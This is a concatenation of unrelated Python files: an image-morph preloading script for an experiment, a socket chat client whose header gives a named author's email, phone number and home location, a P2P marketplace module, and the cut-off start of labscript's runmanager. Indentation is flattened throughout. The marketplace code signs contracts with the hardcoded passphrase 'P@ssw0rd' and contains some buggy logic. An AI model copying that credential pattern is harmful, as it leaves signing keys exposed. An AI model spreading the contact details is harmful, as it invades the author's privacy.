# {"A": "bed", "B": "Chair", "C": "table", "D": "bench"}
# '''
# tune=tune-1 # tune is 4 here
# tune is now 3 after the decrement
# start = time.time()
# imageLists={}
# numberOfUpdates=16 # corresponds to 66 updates A - 15 + C1 + 15 + 1 + 15 + 1
# # A 10 C 10 A 10 D 10 A
# last_image=''
# for currParameter in tqdm(parameterRange):
# images=[]
# print('maximum morph=',round((tune*currParameter*numberOfUpdates+2)/numberOfUpdates+1))
# for axis in ['bedTable', 'benchBed']:
# tmp_images=[]
# for currImg in range(1, int(round(tune*currParameter*numberOfUpdates+2)), int((currParameter*numberOfUpdates+2)/numberOfUpdates)):
# currMorph=100-round(currImg/numberOfUpdates+1) if axis=='benchBed' else round(currImg/numberOfUpdates+1)
# check that the morph value stays within 1-99
# if currMorph<1 or currMorph>99:
# raise Exception('morphing outside limit')
# curr_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
# if curr_image!=last_image:
# currImage = cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
# tmp_images.append(currImage)
# last_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
# # images=images+sample(tmp_images) # down-sample the longer tmp_images list, keeping 10 of them as the new, shorter tmp_images
# images=images+tmp_images
# tmp_images=[]
# for currImg in reversed(range(1,int(round(tune*currParameter*numberOfUpdates+1)),int((currParameter*numberOfUpdates+2)/numberOfUpdates))):
# currMorph=100-round(currImg/numberOfUpdates+1) if axis=='benchBed' else round(currImg/numberOfUpdates+1)
# curr_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
# if curr_image!=last_image:
# currImage = cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
# tmp_images.append(currImage)
# last_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
# # images=images+sample(tmp_images)
# images=images+tmp_images
# imageLists[currParameter]=images
# end = time.time()
# print("preload image duration=", end - start)
# return imageLists
# preload image list for parameter from 1 to 19.
def preloadimages(parameterRange=np.arange(1,20),tune=1):
'''
purpose:
        preload images into image-object sequences corresponding to each parameter
        each parameter corresponds to 40 image objects
steps:
'''
tune=tune-1
start = time.time()
imageLists={}
numberOfUpdates=16 # corresponds to 66 updates
last_image=''
for currParameter in tqdm(parameterRange): #49
images=[]
print('maximum morph=',round((tune*currParameter*numberOfUpdates+2)/numberOfUpdates+1))
for axis in ['bedTable', 'benchBed']:
tmp_images=[]
for currImg in range(1,int(round(tune*currParameter*numberOfUpdates+2)),int((currParameter*numberOfUpdates+2)/numberOfUpdates)):
currMorph=100-round(currImg/numberOfUpdates+1) if axis=='benchBed' else round(currImg/numberOfUpdates+1)
if currMorph<1 or currMorph>99:
raise Exception('morphing outside limit')
curr_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
if curr_image!=last_image:
# currImage=visual.ImageStim(win=mywin,
# name='image',
# image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5), mask=None,
# ori=0, pos=(0, 0), size=(0.5, 0.5),
# color=[1,1,1], colorSpace='rgb', opacity=1,
# flipHoriz=False, flipVert=False,
# texRes=128, interpolate=True, depth=-4.0)
currImage = cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
tmp_images.append(currImage)
last_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
images=images+sample(tmp_images)
tmp_images=[]
for currImg in reversed(range(1,int(round(tune*currParameter*numberOfUpdates+1)),int((currParameter*numberOfUpdates+2)/numberOfUpdates))):
currMorph=100-round(currImg/numberOfUpdates+1) if axis=='benchBed' else round(currImg/numberOfUpdates+1)
curr_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
if curr_image!=last_image:
# currImage=visual.ImageStim(win=mywin,
# name='image',
# image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5), mask=None,
# ori=0, pos=(0, 0), size=(0.5, 0.5),
# color=[1,1,1], colorSpace='rgb', opacity=1,
# flipHoriz=False, flipVert=False,
# texRes=128, interpolate=True, depth=-4.0)
currImage = cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
tmp_images.append(currImage)
last_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
images=images+sample(tmp_images)
imageLists.update( {currParameter : images} )
end = time.time()
print("preload image duration=", end - start)
return imageLists
_=time.time()
imageLists=preloadimages(parameterRange=np.arange(1,33),tune=tune)
print(f"len(imageLists)={len(imageLists)}")
print(f"len(imageLists[1])={len(imageLists[1])}") # 97 97 = 194
'''Convert the image sequence into a video'''
def pic2vid(imgList,save2=''):
import cv2
img_array = []
for filename in imgList:
img = cv2.imread(filename)
height, width, layers = img.shape
size = (width,height)
img_array.append(img)
fps = 20
out = cv2.VideoWriter(f'/Users/kailong/Downloads/{save2}.avi',cv2.VideoWriter_fourcc(*'DIVX'), fps, size)
for i in range(len(img_array)):
out.write(img_array[i])
out.release()
pic2vid(imageLists[32],save2="32")
"""如何理解图片顺序的设计"""
tune=4
parameterRange=np.arange(1,20)
tune=1
tune=tune-1 # tune is 4 here
# tune is now 3 after the decrement
start = time.time()
imageLists={}
numberOfUpdates=16 # corresponds to 66 updates A - 15 + C1 + 15 + 1 + 15 + 1
# A 10 C 10 A 10 D 10 A
last_image=''
for currParameter in tqdm(parameterRange):
images=[]
print('maximum morph=',round((tune*currParameter*numberOfUpdates+2)/numberOfUpdates+1))
for axis in ['bedTable', 'benchBed']:
tmp_images=[]
for currImg in range(1, int(round(tune*currParameter*numberOfUpdates+2)), int((currParameter*numberOfUpdates+2)/numberOfUpdates)):
            # compute the current morph level
currMorph=100-round(currImg/numberOfUpdates+1) if axis=='benchBed' else round(currImg/numberOfUpdates+1)
            # make sure the morph value stays within 1-99
if currMorph<1 or currMorph>99:
raise Exception('morphing outside limit')
            # the image file corresponding to this morph level
currImage = cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
tmp_images.append(currImage)
images=images+sample(tmp_images)
tmp_images=[]
for currImg in reversed(range(1,int(round(tune*currParameter*numberOfUpdates+1)),int((currParameter*numberOfUpdates+2)/numberOfUpdates))):
currMorph=100-round(currImg/numberOfUpdates+1) if axis=='benchBed' else round(currImg/numberOfUpdates+1)
curr_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
if curr_image!=last_image:
                currImage = cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
tmp_images.append(currImage)
last_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
images=images+sample(tmp_images)
imageLists.update( {currParameter : images} )
end = time.time()
print("preload image duration=", end - start)
|
client2.py
|
"""
network_client v1.0
done by:
Moe Assal
Contact:
mohammad.elassal04@gmail.com
phone number: +96171804948
location: Lebanon, Bekaa, Khirbet Rouha
v2.0:
reboot without exiting
"""
import socket
import threading
HOST = "127.0.0.1"
PORT = 5431
my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def byte_to_string(bytes_):
bytes_ = str(bytes_)
return bytes_[2:len(bytes_) - 1] # converts from "b'string_passed'" to "string_passed"
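# Note: for text payloads, bytes_.decode("utf-8", errors="replace") would be a
# more direct conversion (assuming the messages are UTF-8 encoded)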
def receive_and_print_data():
global received_data
while True:
try:
received_data = my_sock.recv(1024)
print(byte_to_string(received_data))
received_data = None
except ConnectionResetError:
print("you have been disconnected by an error in the server, we will fix the problem as soon as possible.")
print("please reboot")
return False
def send_data():
global input_data
while True:
try:
input_data = input()
my_sock.send(str.encode(input_data))
except ConnectionResetError:
return False
def initialize_client():
try:
my_sock.connect((HOST, PORT))
received_data_thread = threading.Thread(target=receive_and_print_data, args=())
send_data_thread = threading.Thread(target=send_data, args=())
send_data_thread.setDaemon(True)
received_data_thread.start()
send_data_thread.start()
return True
except ConnectionRefusedError:
print("server refused connection, we will fix the problem as soon as possible.")
print("please reboot")
return False
if __name__ == '__main__':
initialize_client()
|
market.py
|
"""
This module manages all market related activities
"""
from StringIO import StringIO
import ast
from base64 import b64decode, b64encode
import logging
import traceback
from PIL import Image, ImageOps
import gnupg
import tornado
from zmq.eventloop import ioloop
import constants
from pybitcointools.main import privkey_to_pubkey
from data_uri import DataURI
from orders import Orders
from protocol import proto_page, query_page
from threading import Thread
from crypto_util import makePrivCryptor
import random
import json
import hashlib
ioloop.install()
class Market(object):
def __init__(self, transport, db):
"""This class manages the active market for the application
Attributes:
transport (CryptoTransportLayer): Transport layer for messaging between nodes.
dht (DHT): For storage across the network.
market_id (int): Indicates which local market we're working with.
"""
# Current
self.transport = transport
self.dht = transport.get_dht()
self.market_id = transport.get_market_id()
# self._myself = transport.get_myself()
self.peers = self.dht.getActivePeers()
self.db = db
self.orders = Orders(transport, self.market_id, db)
self.pages = {}
self.mypage = None
self.signature = None
self.nickname = ""
self.log = logging.getLogger(
'[%s] %s' % (self.market_id, self.__class__.__name__)
)
self.settings = self.transport.settings
self.gpg = gnupg.GPG()
# Register callbacks for incoming events
self.transport.add_callbacks([
('query_myorders', self.on_query_myorders),
('peer', self.on_peer),
('query_page', self.on_query_page),
('query_listings', self.on_query_listings),
('negotiate_pubkey', self.on_negotiate_pubkey),
('proto_response_pubkey', self.on_response_pubkey)
])
self.load_page()
# Periodically refresh buckets
loop = tornado.ioloop.IOLoop.instance()
refreshCB = tornado.ioloop.PeriodicCallback(self.dht._refreshNode,
constants.refreshTimeout,
io_loop=loop)
refreshCB.start()
def load_page(self):
nickname = self.settings['nickname'] \
if 'nickname' in self.settings else ""
        # store_description = self.settings['storeDescription'] if 'storeDescription' in self.settings else ""
self.nickname = nickname
def disable_welcome_screen(self):
self.db.updateEntries(
"settings",
{'market_id': self.transport.market_id},
{"welcome": "disable"}
)
def private_key(self):
return self.settings['secret']
def on_listing_results(self, results):
self.log.debug('Listings %s' % results)
@staticmethod
def process_contract_image(image):
uri = DataURI(image)
imageData = uri.data
# mime_type = uri.mimetype
charset = uri.charset
image = Image.open(StringIO(imageData))
croppedImage = ImageOps.fit(image, (200, 200), centering=(0.5, 0.5))
data = StringIO()
croppedImage.save(data, format='PNG')
new_uri = DataURI.make(
'image/png',
charset=charset,
base64=True,
data=data.getvalue())
data.close()
return new_uri
@staticmethod
def get_contract_id():
return random.randint(0, 1000000)
@staticmethod
def linebreak_signing_data(data):
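        # Wrap the JSON-serialised contract at 52 characters per line so the
        # resulting text can be clear-signed with GPG in save_contract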
json_string = json.dumps(data, indent=0)
seg_len = 52
out_text = "\n".join(
json_string[x:x + seg_len]
for x in range(0, len(json_string), seg_len)
)
return out_text
@staticmethod
def generate_contract_key(signed_contract):
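        # The contract key is RIPEMD-160(SHA-1(signed contract)) in hex; it is
        # later used as the DHT key under which the listing is stored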
contract_hash = hashlib.sha1(str(signed_contract)).hexdigest()
hash_value = hashlib.new('ripemd160')
hash_value.update(contract_hash)
return hash_value.hexdigest()
def save_contract_to_db(self, contract_id, body, signed_body, key):
self.db.insertEntry(
"contracts",
{
"id": contract_id,
"market_id": self.transport.market_id,
"contract_body": json.dumps(body),
"signed_contract_body": str(signed_body),
"state": "seed",
"deleted": 0,
"key": key
}
)
def update_keywords_on_network(self, key, keywords):
for keyword in keywords:
keyword = keyword.upper()
hash_value = hashlib.new('ripemd160')
keyword_key = 'keyword-%s' % keyword
hash_value.update(keyword_key.encode('utf-8'))
keyword_key = hash_value.hexdigest()
self.log.debug('Sending keyword to network: %s' % keyword_key)
self.transport.dht.iterativeStore(
self.transport,
keyword_key,
json.dumps({
'keyword_index_add': {
"guid": self.transport.guid,
"key": key
}
}),
self.transport.guid
)
def save_contract(self, msg):
contract_id = self.get_contract_id()
# Refresh market settings
self.settings = self.get_settings()
msg['Seller']['seller_PGP'] = self.gpg.export_keys(self.settings['PGPPubkeyFingerprint'])
msg['Seller']['seller_BTC_uncompressed_pubkey'] = self.settings['btc_pubkey']
msg['Seller']['seller_GUID'] = self.settings['guid']
msg['Seller']['seller_Bitmessage'] = self.settings['bitmessage']
# Process and crop thumbs for images
if 'item_images' in msg['Contract']:
if 'image1' in msg['Contract']['item_images']:
img = msg['Contract']['item_images']['image1']
self.log.debug('Contract Image %s' % img)
new_uri = self.process_contract_image(img)
msg['Contract']['item_images'] = new_uri
else:
self.log.debug('No image for contract')
# Line break the signing data
out_text = self.linebreak_signing_data(msg)
# Sign the contract
signed_data = self.gpg.sign(out_text,
passphrase='P@ssw0rd',
keyid=self.settings.get('PGPPubkeyFingerprint'))
# Save contract to DHT
contract_key = self.generate_contract_key(signed_data)
# Store contract in database
self.save_contract_to_db(contract_id, msg, signed_data, contract_key)
# Store listing
t = Thread(target=self.transport.dht.iterativeStore, args=(self.transport,
contract_key,
str(signed_data),
self.transport.guid))
t.start()
t2 = Thread(target=self.update_listings_index)
t2.start()
# If keywords are present
keywords = msg['Contract']['item_keywords']
t3 = Thread(target=self.update_keywords_on_network, args=(contract_key, keywords,))
t3.start()
def shipping_address(self):
settings = self.get_settings()
shipping_address = {"recipient_name": settings.get('recipient_name'),
"street1": settings.get('street1'),
"street2": settings.get('street2'),
"city": settings.get('city'),
"stateRegion": settings.get('stateRegion'),
"stateProvinceRegion": settings.get('stateProvinceRegion'),
"zip": settings.get('zip'),
"country": settings.get('country'),
"countryCode": settings.get('countryCode')}
return shipping_address
def add_trusted_notary(self, guid, nickname=""):
self.log.debug('%s %s' % (guid, nickname))
notaries = self.settings.get('notaries')
self.log.debug('notaries: %s' % notaries)
if notaries == "" or notaries == []:
notaries = []
else:
notaries = json.loads(notaries)
        for idx, notary in enumerate(notaries):
            self.log.info(notary)
            if notary.get('guid') == guid:
                if notary.get('nickname') != nickname:
                    notary['nickname'] = nickname
                    notaries[idx] = notary
                    self.settings['notaries'] = json.dumps(notaries)
return
notaries.append({"guid": guid, "nickname": nickname})
self.settings['notaries'] = json.dumps(notaries)
if 'btc_pubkey' in self.settings:
del self.settings['btc_pubkey']
self.db.updateEntries(
"settings",
{'market_id': self.transport.market_id},
self.settings
)
def _decode_list(self, data):
rv = []
for item in data:
if isinstance(item, unicode):
item = item.encode('utf-8')
elif isinstance(item, list):
item = self._decode_list(item)
elif isinstance(item, dict):
item = self._decode_dict(item)
rv.append(item)
return rv
def _decode_dict(self, data):
rv = {}
for key, value in data.iteritems():
if isinstance(key, unicode):
key = key.encode('utf-8')
if isinstance(value, unicode):
value = value.encode('utf-8')
elif isinstance(value, list):
value = self._decode_list(value)
elif isinstance(value, dict):
value = self._decode_dict(value)
rv[key] = value
return rv
def remove_trusted_notary(self, guid):
notaries = self.settings.get('notaries')
notaries = ast.literal_eval(notaries)
for idx, notary in enumerate(notaries):
if notary.get('guid') == guid:
del notaries[idx]
self.settings['notaries'] = json.dumps(notaries)
self.db.updateEntries(
"settings",
{'market_id': self.transport.market_id},
self.settings
)
def republish_contracts(self):
listings = self.db.selectEntries("contracts", {"deleted": 0})
for listing in listings:
self.transport.dht.iterativeStore(
self.transport,
listing['key'],
listing.get('signed_contract_body'),
self.transport.guid
)
            # Push keyword index out again
            contract = json.loads(listing.get('contract_body', '{}'))
            keywords = contract.get('Contract', {}).get('item_keywords', [])
            t3 = Thread(target=self.update_keywords_on_network, args=(listing.get('key'), keywords,))
t3.start()
self.update_listings_index()
def get_notaries(self, online_only=False):
self.log.debug('Getting notaries')
notaries = []
settings = self.get_settings()
# Untested code
if online_only:
notaries = {}
for n in settings['notaries']:
peer = self.dht.routingTable.getContact(n.guid)
if peer is not None:
t = Thread(target=peer.start_handshake)
t.start()
notaries.append(n)
return notaries
# End of untested code
return settings['notaries']
@staticmethod
def valid_guid(guid):
return len(guid) == 40 and int(guid, 16)
def republish_listing(self, msg):
listing_id = msg.get('productID')
listing = self.db.selectEntries("products", {"id": listing_id})
if listing:
listing = listing[0]
else:
return
listing_key = listing['key']
self.transport.dht.iterativeStore(
self.transport,
listing_key,
listing.get('signed_contract_body'),
self.transport.guid
)
self.update_listings_index()
# If keywords store them in the keyword index
# keywords = msg['Contract']['item_keywords']
# self.log.info('Keywords: %s' % keywords)
# for keyword in keywords:
#
# hash_value = hashlib.new('ripemd160')
# hash_value.update('keyword-%s' % keyword)
# keyword_key = hash_value.hexdigest()
#
# self.transport.dht.iterativeStore(self.transport, keyword_key, json.dumps({'keyword_index_add': contract_key}), self.transport.guid)
def update_listings_index(self):
# Store to marketplace listing index
contract_index_key = hashlib.sha1('contracts-%s' %
self.transport.guid).hexdigest()
hashvalue = hashlib.new('ripemd160')
hashvalue.update(contract_index_key)
contract_index_key = hashvalue.hexdigest()
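        # contract_index_key = RIPEMD-160(SHA-1('contracts-<guid>')): a single
        # per-node DHT key under which this node's listing index is published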
# Calculate index of contracts
contract_ids = self.db.selectEntries(
"contracts",
{"market_id": self.transport.market_id, "deleted": 0}
)
my_contracts = []
for contract_id in contract_ids:
my_contracts.append(contract_id['key'])
self.log.debug('My Contracts: %s' % my_contracts)
# Sign listing index for validation and tamper resistance
data_string = str({'guid': self.transport.guid,
'contracts': my_contracts})
signature = makePrivCryptor(self.transport.settings['secret']).sign(data_string).encode('hex')
value = {'signature': signature,
'data': {'guid': self.transport.guid,
'contracts': my_contracts}}
# Pass off to thread to keep GUI snappy
t = Thread(target=self.transport.dht.iterativeStore, args=(self.transport,
contract_index_key,
value,
self.transport.guid,))
t.start()
def remove_contract(self, msg):
self.log.info("Removing contract: %s" % msg)
# Remove from DHT keyword indices
self.remove_from_keyword_indexes(msg['contract_id'])
self.db.updateEntries("contracts", {"id": msg["contract_id"]}, {"deleted": 1})
self.update_listings_index()
def remove_from_keyword_indexes(self, contract_id):
contract = self.db.selectEntries("contracts", {"id": contract_id})[0]
contract_key = contract['key']
contract = json.loads(contract['contract_body'])
contract_keywords = contract['Contract']['item_keywords']
for keyword in contract_keywords:
# Remove keyword from index
hash_value = hashlib.new('ripemd160')
keyword_key = 'keyword-%s' % keyword
hash_value.update(keyword_key.encode('utf-8'))
keyword_key = hash_value.hexdigest()
self.transport.dht.iterativeStore(
self.transport,
keyword_key,
json.dumps({
'keyword_index_remove': {
"guid": self.transport.guid,
"key": contract_key
}
}),
self.transport.guid
)
def get_messages(self):
self.log.info("Listing messages for market: %s" % self.transport.market_id)
settings = self.get_settings()
try:
# Request all messages for our address
inboxmsgs = json.loads(self.transport.bitmessage_api.getInboxMessagesByReceiver(
settings['bitmessage']))
for m in inboxmsgs['inboxMessages']:
# Base64 decode subject and content
m['subject'] = b64decode(m['subject'])
m['message'] = b64decode(m['message'])
# TODO: Augment with market, if available
return {"messages": inboxmsgs}
except Exception as e:
self.log.error("Failed to get inbox messages: {}".format(e))
self.log.error(traceback.format_exc())
return {}
def send_message(self, msg):
self.log.info("Sending message for market: %s" % self.transport.market_id)
settings = self.get_settings()
try:
# Base64 decode subject and content
self.log.info("Encoding message: {}".format(msg))
subject = b64encode(msg['subject'])
body = b64encode(msg['body'])
result = self.transport.bitmessage_api.sendMessage(
msg['to'], settings['bitmessage'], subject, body
)
self.log.info("Send message result: {}".format(result))
return {}
except Exception as e:
self.log.error("Failed to send message: %s" % e)
self.log.error(traceback.format_exc())
return {}
def get_contracts(self, page=0):
self.log.info('Getting contracts for market: %s' % self.transport.market_id)
contracts = self.db.selectEntries(
"contracts",
{"market_id": self.transport.market_id, "deleted": 0},
limit=10,
limit_offset=(page * 10)
)
my_contracts = []
for contract in contracts:
try:
contract_body = json.loads(u"%s" % contract['contract_body'])
item_price = contract_body.get('Contract').get('item_price') if contract_body.get('Contract').get('item_price') > 0 else 0
shipping_price = contract_body.get('Contract').get('item_delivery').get('shipping_price') if contract_body.get('Contract').get('item_delivery').get('shipping_price') > 0 else 0
my_contracts.append({"key": contract['key'] if 'key' in contract else "",
"id": contract['id'] if 'id' in contract else "",
"item_images": contract_body.get('Contract').get('item_images'),
"signed_contract_body": contract['signed_contract_body'] if 'signed_contract_body' in contract else "",
"contract_body": contract_body,
"unit_price": item_price,
"deleted": contract.get('deleted'),
"shipping_price": shipping_price,
"item_title": contract_body.get('Contract').get('item_title'),
"item_desc": contract_body.get('Contract').get('item_desc'),
"item_condition": contract_body.get('Contract').get('item_condition'),
"item_quantity_available": contract_body.get('Contract').get('item_quantity')})
            except Exception:
                self.log.error('Problem loading the contract body JSON')
return {"contracts": my_contracts, "page": page,
"total_contracts": len(self.db.selectEntries("contracts", {"deleted": "0"}))}
def undo_remove_contract(self, contract_id):
self.log.info('Undo remove contract: %s' % contract_id)
self.db.updateEntries("contracts",
{"market_id": self.transport.market_id.replace("'", "''"), "id": contract_id},
{"deleted": "0"})
# SETTINGS
def save_settings(self, msg):
self.log.debug("Settings to save %s" % msg)
# Check for any updates to arbiter or notary status to push to the DHT
if 'notary' in msg:
# Generate notary index key
hash_value = hashlib.new('ripemd160')
hash_value.update('notary-index')
key = hash_value.hexdigest()
if msg['notary'] is True:
self.log.info('Letting the network know you are now a notary')
data = json.dumps({'notary_index_add': self.transport.guid})
self.transport.dht.iterativeStore(self.transport, key, data, self.transport.guid)
else:
self.log.info('Letting the network know you are not a notary')
data = json.dumps({'notary_index_remove': self.transport.guid})
self.transport.dht.iterativeStore(self.transport, key, data, self.transport.guid)
# Update nickname
self.transport.nickname = msg['nickname']
if 'burnAmount' in msg:
del msg['burnAmount']
if 'burnAddr' in msg:
del msg['burnAddr']
# Update local settings
self.db.updateEntries("settings", {'market_id': self.transport.market_id}, msg)
def get_settings(self):
self.log.info('Getting settings info for Market %s' % self.transport.market_id)
settings = self.db.getOrCreate("settings", {"market_id": self.transport.market_id})
if settings['arbiter'] == 1:
settings['arbiter'] = True
if settings['notary'] == 1:
settings['notary'] = True
settings['notaries'] = ast.literal_eval(settings['notaries']) if settings['notaries'] != "" else []
settings['trustedArbiters'] = ast.literal_eval(settings['trustedArbiters']) if settings['trustedArbiters'] != "" else []
settings['privkey'] = settings['privkey'] if 'secret' in settings else ""
settings['btc_pubkey'] = privkey_to_pubkey(settings.get('privkey'))
settings['secret'] = settings['secret'] if 'secret' in settings else ""
self.log.info('SETTINGS: %s' % settings)
if settings:
return settings
else:
return {}
# PAGE QUERYING
def query_page(self, find_guid, callback=lambda msg: None):
self.log.info('Searching network for node: %s' % find_guid)
msg = query_page(find_guid)
msg['uri'] = self.transport.uri
msg['senderGUID'] = self.transport.guid
msg['sin'] = self.transport.sin
msg['pubkey'] = self.transport.pubkey
self.transport.send(msg, find_guid, callback)
# Return your page info if someone requests it on the network
def on_query_page(self, peer):
self.log.info("Someone is querying for your page")
settings = self.get_settings()
new_peer = self.transport.get_crypto_peer(
peer['senderGUID'],
peer['uri'],
pubkey=peer['pubkey'],
nickname=peer['senderNick']
)
def send_page_query():
t = Thread(target=new_peer.start_handshake)
t.start()
new_peer.send(proto_page(self.transport.uri,
self.transport.pubkey,
self.transport.guid,
settings['storeDescription'],
self.signature,
settings['nickname'],
settings['PGPPubKey'] if 'PGPPubKey' in settings else '',
settings['email'] if 'email' in settings else '',
settings['bitmessage'] if 'bitmessage' in settings else '',
settings['arbiter'] if 'arbiter' in settings else '',
settings['notary'] if 'notary' in settings else '',
settings['arbiterDescription'] if 'arbiterDescription' in settings else '',
self.transport.sin))
t = Thread(target=send_page_query)
t.start()
def on_query_myorders(self, peer):
self.log.info("Someone is querying for your page: %s" % peer)
def on_query_listings(self, peer, page=0):
self.log.info("Someone is querying your listings: %s" % peer)
contracts = self.get_contracts(page)
if len(contracts['contracts']) == 0:
self.transport.send({"type": "no_listing_result"}, peer['senderGUID'])
return
else:
for contract in contracts['contracts']:
contract['type'] = "listing_result"
self.transport.send(contract, peer['senderGUID'])
def on_peer(self, peer):
pass
def on_negotiate_pubkey(self, ident_pubkey):
self.log.info("Someone is asking for your real pubKey")
assert "nickname" in ident_pubkey
assert "ident_pubkey" in ident_pubkey
nickname = ident_pubkey['nickname']
ident_pubkey = ident_pubkey['ident_pubkey'].decode("hex")
self.transport.respond_pubkey_if_mine(nickname, ident_pubkey)
def on_response_pubkey(self, response):
assert "pubkey" in response
assert "nickname" in response
assert "signature" in response
pubkey = response["pubkey"].decode("hex")
# signature = response["signature"].decode("hex")
nickname = response["nickname"]
# Cache mapping for later.
if nickname not in self.transport.nick_mapping:
self.transport.nick_mapping[nickname] = [None, pubkey]
# Verify signature here...
# Add to our dict.
self.transport.nick_mapping[nickname][1] = pubkey
self.log.info("[market] mappings: ###############")
for key, value in self.transport.nick_mapping.iteritems():
self.log.info("'%s' -> '%s' (%s)" % (
key, value[1].encode("hex") if value[1] is not None else value[1],
value[0].encode("hex") if value[0] is not None else value[0]))
self.log.info("##################################")
def release_funds_to_merchant(self, buyer_order_id, tx, script, signatures, guid):
self.log.debug('Release funds to merchant: %s %s %s %s' % (buyer_order_id, tx, signatures, guid))
self.transport.send(
{
'type': 'release_funds_tx',
'tx': tx,
'script': script,
'buyer_order_id': buyer_order_id,
'signatures': signatures
},
guid
)
self.log.debug('TX sent to merchant')
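# Hedged usage sketch (illustrative only; all names here are hypothetical): a
# buyer-side caller would release escrowed funds roughly like this:
#
#     market.release_funds_to_merchant(
#         buyer_order_id='1234',        # hypothetical order id
#         tx=raw_tx_hex,                # partially signed multisig transaction
#         script=redeem_script_hex,
#         signatures=[sig1, sig2],
#         guid=merchant_guid,
#     )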
|
__main__.py
|
#####################################################################
# #
# __main__.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program runmanager, in the labscript #
# suite (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
from labscript_utils import PY2
if PY2:
str = unicode
import Queue as queue
else:
import queue
import os
import sys
import labscript_utils.excepthook
try:
from labscript_utils import check_version
except ImportError:
raise ImportError('Require labscript_utils > 2.1.0')
check_version('labscript_utils', '2.10.0', '3')
# Splash screen
from labscript_utils.splash import Splash
splash = Splash(os.path.join(os.path.dirname(__file__), 'runmanager.svg'))
splash.show()
splash.update_text('importing standard library modules')
import time
import contextlib
import subprocess
import threading
import ast
import pprint
import traceback
splash.update_text('importing matplotlib')
# Evaluation of globals happens in a thread with the pylab module imported.
# Although we don't care about plotting, importing pylab makes Qt calls. We
# can't have that from a non main thread, so we'll just disable matplotlib's
# GUI integration:
import matplotlib
matplotlib.use('Agg')
import signal
# Quit on ctrl-c
signal.signal(signal.SIGINT, signal.SIG_DFL)
splash.update_text('importing Qt')
check_version('qtutils', '2.2.2', '3.0.0')
splash.update_text('importing pandas')
check_version('pandas', '0.13', '2')
from qtutils.qt import QtCore, QtGui, QtWidgets
from qtutils.qt.QtCore import pyqtSignal as Signal
splash.update_text('importing labscript suite modules')
check_version('labscript_utils', '2.11.0', '3')
from labscript_utils.ls_zprocess import zmq_get, ProcessTree, ZMQServer
from labscript_utils.labconfig import LabConfig
from labscript_utils.setup_logging import setup_logging
import labscript_utils.shared_drive as shared_drive
from labscript_utils import dedent
from zprocess import raise_exception_in_thread
import runmanager
import runmanager.remote
from qtutils import (
inmain,
inmain_decorator,
UiLoader,
inthread,
DisconnectContextManager,
qtlock,
)
from labscript_utils.qtwidgets.outputbox import OutputBox
import qtutils.icons
GLOBAL_MONOSPACE_FONT = "Consolas" if os.name == 'nt' else "Ubuntu Mono"
# Set working directory to runmanager folder, resolving symlinks
runmanager_dir = os.path.dirname(os.path.realpath(__file__))
os.chdir(runmanager_dir)
process_tree = ProcessTree.instance()
# Set a meaningful name for zprocess.locking's client id:
process_tree.zlock_client.set_process_name('runmanager')
def log_if_global(g, g_list, message):
"""logs a message if the global name "g" is in "g_list"
useful if you want to print out a message inside a loop over globals,
but only for a particular global (or set of globals).
If g_list is empty, then it will use the hardcoded list below
(useful if you want to change the behaviour globally)
"""
if not isinstance(g_list, list):
g_list = [g_list]
if not g_list:
g_list = [] # add global options here
if g in g_list:
logger.info(message)
def composite_colors(r0, g0, b0, a0, r1, g1, b1, a1):
"""composite a second colour over a first with given alpha values and return the
result"""
a0 /= 255
a1 /= 255
a = a0 + a1 - a0 * a1
r = (a1 * r1 + (1 - a1) * a0 * r0) / a
g = (a1 * g1 + (1 - a1) * a0 * g0) / a
b = (a1 * b1 + (1 - a1) * a0 * b0) / a
return [int(round(x)) for x in (r, g, b, 255 * a)]
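# Worked example (added for clarity): compositing half-transparent white
# (alpha 128) over opaque black gives mid grey, and compositing a fully opaque
# colour returns that colour unchanged:
#
#     >>> composite_colors(0, 0, 0, 255, 255, 255, 255, 128)
#     [128, 128, 128, 255]
#     >>> composite_colors(0, 0, 0, 255, 255, 0, 0, 255)
#     [255, 0, 0, 255]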
def set_win_appusermodel(window_id):
from labscript_utils.winshell import set_appusermodel, appids, app_descriptions
icon_path = os.path.abspath('runmanager.ico')
executable = sys.executable.lower()
if not executable.endswith('w.exe'):
executable = executable.replace('.exe', 'w.exe')
relaunch_command = executable + ' ' + os.path.abspath(__file__.replace('.pyc', '.py'))
relaunch_display_name = app_descriptions['runmanager']
set_appusermodel(window_id, appids['runmanager'], icon_path, relaunch_command, relaunch_display_name)
@inmain_decorator()
def error_dialog(message):
QtWidgets.QMessageBox.warning(app.ui, 'runmanager', message)
@inmain_decorator()
def question_dialog(message):
